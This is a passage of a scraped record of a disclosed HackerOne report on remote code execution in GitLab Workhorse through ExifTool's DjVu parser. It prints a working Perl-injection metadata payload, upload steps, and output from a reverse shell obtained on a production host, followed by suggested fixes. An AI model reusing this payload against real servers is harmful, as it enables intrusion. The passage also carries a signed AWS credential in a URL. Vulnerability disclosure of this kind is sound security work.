/usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/2:2]\ngit 21109 48.3 1.9 2572804 1258580 ? Sl 12:55 9:17 puma: cluster worker 5: 7369 [gitlab-puma-worker]\nroot 21296 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/8:1]\nroot 21299 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/1:0]\nroot 21301 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/7:0]\nroot 21306 0.0 0.0 0 0 ? I 10:52 0:00 [kworker/15:1]\nroot 21376 0.0 0.0 0 0 ? I 09:59 0:00 [kworker/9:0]\ngit 21698 48.0 2.2 3093788 1459416 ? Sl 12:26 23:00 puma: cluster worker 9: 7369 [gitlab-puma-worker]\nroot 22003 0.2 0.0 0 0 ? I 12:26 0:05 [kworker/u32:3]\nroot 22131 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/9:2]\nroot 22135 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/4:2]\nroot 22142 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/12:3]\nroot 22143 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/3:1]\nroot 22144 0.0 0.0 0 0 ? I 11:57 0:00 [kworker/13:0]\nroot 22863 0.0 0.0 161112 54712 ? Ssl Jan18 0:15 /opt/chef/embedded/bin/ruby --disable-gems /usr/bin/chef-client -c /etc/chef/client.rb -i 1800 -s 300\nroot 24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\nroot 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\ngit 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\nroot 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\nroot 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\nroot 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\nroot 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\ngit 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\ngit 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\nroot 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\nroot 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\nroot 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\nroot 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\nroot 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\ngit 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\ngit 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\ngit 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\nroot 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\nroot 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\nroot 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\nroot 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\nroot 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\nroot 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\ngit 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\ngit 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\nexit\n```\n\n\n### Impact\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n{F1257008}\n{F1257009}\n\n### What is the current *bug* behavior?\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected *correct* behavior?\n* There must be better ways of convert C escape sequences than using `eval`\n* Only the TIFF and JPEG modules should be used\n* GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n```\nSystem information\nSystem:\nProxy:\t\tno\nCurrent User:\tgit\nUsing RVM:\tno\nRuby Version:\t2.7.2p137\nGem Version:\t3.1.4\nBundler Version:2.1.4\nRake Version:\t13.0.3\nRedis Version:\t6.0.10\nGit Version:\t2.29.0\nSidekiq Version:5.2.9\nGo Version:\tunknown\n\nGitLab information\nVersion:\t13.10.2-ee\nRevision:\tcc4224220e6\nDirectory:\t/opt/gitlab/embedded/service/gitlab-rails\nDB Adapter:\tPostgreSQL\nDB Version:\t12.6\nURL:\t\thttp://192.168.0.127:9080\nHTTP Clone URL:\thttp://192.168.0.127:9080/some-group/some-project.git\nSSH Clone URL:\tgit@192.168.0.127:some-group/some-project.git\nElasticsearch:\tno\nGeo:\t\tno\nUsing LDAP:\tno\nUsing Omniauth:\tyes\nOmniauth Providers:\n\nGitLab Shell\nVersion:\t13.17.0\nRepository storage paths:\n- default: \t/var/opt/gitlab/git-data/repositories\nGitLab Shell path:\t\t/opt/gitlab/embedded/service/gitlab-shell\nGit:\t\t/opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\n* Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-15T21:29:46", "history": [], "viewCount": 1, "enchantments": {"dependencies": {"references": [], "modified": "2021-05-15T21:29:46", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2021-05-15T21:29:46", "rev": 2}}, "objectVersion": "1.5", "bounty": 20000.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/gitlab", "handle": "gitlab", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQZCG3EJ5X%2F20210515%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210515T212946Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEIX%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJIMEYCIQDE4Q4PpYtf%2FC6%2BREog3bKQq6iZ7YyC99rj9rgwLnvVrgIhAPeLf2fjUXFCm7xOa%2B%2F58ZAsbUEZyRs49%2Fd2hMXH%2BPOOKvoDCB4QAhoMMDEzNjE5Mjc0ODQ5Igw7aEGu5LUlYXf6ngAq1wPBAgaaCWM03VORlqXPpqSsEnkPPjXTxsWM8nTbiZSFMoKsKQidK2U8OmsyNSm98hBEr329UGWN1pIQ3RUiCDYBaefJcNg7SihHwRB%2BOAyeIkTc1ZkDt1W8fUNn6oIybPRXIaEKds13ov6KPabojIGNQw9xxBGP6K8FW0zn0sYpU%2B8%2BA2Yf83E7wmh2SUGUleAw9Xx8Fq7OLXpRQo%2FBeRkNB8%2FJ7TxsVhMb%2FxE8gOBUpbK5S26RKe5u9%2BoZbRRar%2F1ApPiQL36ew%2F7smExPrlRbVdRFL3E6Ap7IOWHm8mrNzSGqPTh8lEzjbUYHIJp9DpXPbxWSoBdIENcnUBcaL2m7m7xJ9rQl0MufxnFTyj4dD16jzuwJqcMgkSDM5ZXNiJDpyQl%2FzJ6IKOKSX6D5R5x8yBbYIIXc6cSIy%2BI8rTBi%2BwmoHSKxOrMaJZqKBccfUU1E3dpzxq0ht48rsQJrW3bQA0YOzXUodd0G6BsPJLV2OE2hDTC4DtpWbvhsuoLhW8nmv2sRx7la1dUbwNeZX6tVuasXaDx9xrFs96lMXKanbSXp2%2FctidC1POhLdrS8ym7o6xK2XpQk3xeRlrBv6Aq8pSrsyb0pTrQIvpevGOt7QgLHXLrD6B0w7OyAhQY6pAFTrnobPY%2BfL5qEwVP%2FyNFhofhGURRvK9B%2B3odAo8%2BoygvuGobeLqZOy7yb%2FrFU5uKBc9mtbumUemegyt4SipMkTyMImoch%2FdOkLMrRLgZfO4eRn3GWLLFhCKjJflOko7EQ%2FXcJDtrX9Z%2FAFFoQ4LwTG8ReZICDur4rhnlJ4j7ns1qocotfqvWVFrGMcadBYfhfM7nztuDKmKeRSHdHtbUfnh%2BAxw%3D%3D&X-Amz-Signature=32dfaeeec2906ddf651d15dd6d01b6a2d2ce05e1e0231904b25e2b0ff21e45fd"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-15T21:29:46", "differentElements": ["h1reporter"], "edition": 26}, {"bulletin": {"id": "H1:1154542", "hash": "dd04f071092c2fa6bfcdb73d3b4b3d78", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 